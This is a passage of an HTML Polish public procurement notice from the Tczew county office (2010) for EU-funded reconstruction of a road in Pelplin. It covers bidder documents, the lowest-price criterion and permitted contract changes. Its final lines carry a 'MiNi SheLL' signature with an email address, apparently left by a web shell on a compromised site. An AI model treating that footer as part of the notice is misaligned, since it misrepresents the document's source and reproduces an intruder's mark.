<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>5.1.7	Pisemne zobowiązania innych podmiotów do udostępnienia zasobów niezbędnych do realizacji zamówienia, jeżeli Wykonawca, wskazując spełnianie warunków, o których mowa w art. 22 ust. 1 Ustawy, polegał będzie na zasobach tych podmiotów na zasadach określonych w art. 26 ust. 2b Ustawy.

5.2.3	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 5.2.2 składa dokument lub dokumenty określone w § 4 Rozporządzenia w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2009 r. Nr 226, poz. 1817).
5.2.4	Jeżeli wykonawca wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, zobowiązany jest wykazać, że w stosunku do tych podmiotów brak jest podstaw wykluczenia z postępowania o udzielenie zamówienia poprzez złożenie razem z ofertą wymaganych dokumentów potwierdzających brak podstaw do wykluczenia określonych w pkt 5.2.1, 5.2.2 i 5.2.3, jeżeli dotyczy, odnoszących się do każdego z tych podmiotów, o ile podmioty te będą brały udział w realizacji części zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany postanowień niniejszej umowy mogą być dokonane za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności w następujących przypadkach:
1)	zmiany osoby:
a)	przedstawiciela Zamawiającego na budowie,
b)	inspektora nadzoru inwestorskiego w danej branży, pod warunkiem zgodności z postanowieniami SIWZ,
- polegająca na wyznaczeniu nowych osób pełniących daną funkcję;
2)	zmiany/przedłużenia terminu wykonania usługi w sytuacjach:
a)	natrafienia na różnego rodzaju wykopaliska (zabytki) i związaną z tym koniecznością prowadzenia prac archeologicznych;
b)	konieczności dokonania zmian w dokumentacji projektowej o czas niezbędny                     do dokonania zmian w projekcie oraz ewentualnie o czas niezbędny dla dostosowania się Wykonawcy do takiej zmiany;
c)	konieczności wykonania robót zamiennych, w przypadku zaistnienia obiektywnej niemożliwości wykonania robót zgodnie z projektem budowlanym, o czas niezbędny na ich realizację; Konieczność nadzorowania robót zamiennych nie wpłynie na zmianę wysokości umówionego wynagrodzenia ryczałtowego.
d)	zawieszenia wykonywania robot budowlanych; 
Wykonawca nie będzie pobierał wynagrodzenia za okres zawieszenia nadzorowanych robót budowlanych.
e)	konieczności poprawy warunków wykonywania robót zagrażających bezpieczeństwu o czas niezbędny do dokonania ich poprawy;
f)	nie zależnego od stron umowy przedłużania się okresu trwania procedur prowadzonych przez organy administracji publicznej lub inne podmioty - właściwe do wydania niezbędnych decyzji, pozwoleń, uzgodnień, opinii, stanowisk itp. niezbędnych do prawidłowej realizacji nadzorowanych robót budowlanych;
g)	konieczności wszczęcia dodatkowych procedur prowadzonych przez organy administracji publicznej lub inne podmioty właściwe do wydania niezbędnych decyzji, pozwoleń, uzgodnień, opinii, stanowisk itp. niezbędnych do prawidłowej realizacji nadzorowanych robót budowlanych;
h)	konieczności wprowadzenia zmian umowy w następstwie siły wyższej, tj. zdarzenia zewnętrznego, niemożliwego do przewidzenia i niemożliwego do zapobieżenia (niemożliwość zapobieżenia nie tyle samemu zjawisku, co jego następstwom), w tym m.in katastrofa naturalna, katastrofalne działanie przyrody, np niezwykłe mrozy, strajk, zamieszki uliczne, pożar, eksplozja, wojna, atak terrorystyczny np. w zakresie wykonania robót zamiennych, rozwiązań zamiennych;
3)	konieczności zmiany kwoty podatku VAT, w związku ze zmianą powszechnie obowiązujących przepisów prawnych, w szczególności przepisów podatkowych dotyczących obowiązującej wysokości podatku VAT;
4)	konieczności wprowadzenia zmian umowy w następstwie zmian wytycznych lub zaleceń Instytucji, która przyznała środki na dofinansowanie przedmiotu umowy. 
2.	Wykonawca jest zobowiązany do pisemnego poinformowania Zamawiającego o zmianie siedziby. Jeżeli nie dopełni tego obowiązku, korespondencję skierowaną na adres wskazany we wstępie umowy uważa się za skutecznie dostarczoną.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.powiat.tczew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> STAROSTWO POWIATOWE W TCZEWIE woj. pomorskie kod 83-110, ulica Piaskowa 2, w KANCELARII OGÓLNEJ w pokoju nr 319.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2010 godzina 10:00, miejsce: STAROSTWO POWIATOWE W TCZEWIE woj. pomorskie kod 83-110, ulica Piaskowa 2, w KANCELARII OGÓLNEJ w pokoju nr 04.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt: Przebudowa drogi powiatowej - ulicy Kościuszki w Pelplinie (2886G) - etap I, w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007 - 2013, Osi Priorytetowej 8. Lokalna infrastruktura podstawowa. Działanie 8.1 Lokalny potancjał rozwojowy, Poddziałania 8.1.1. Lokalna infrastruktura drogowa, współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com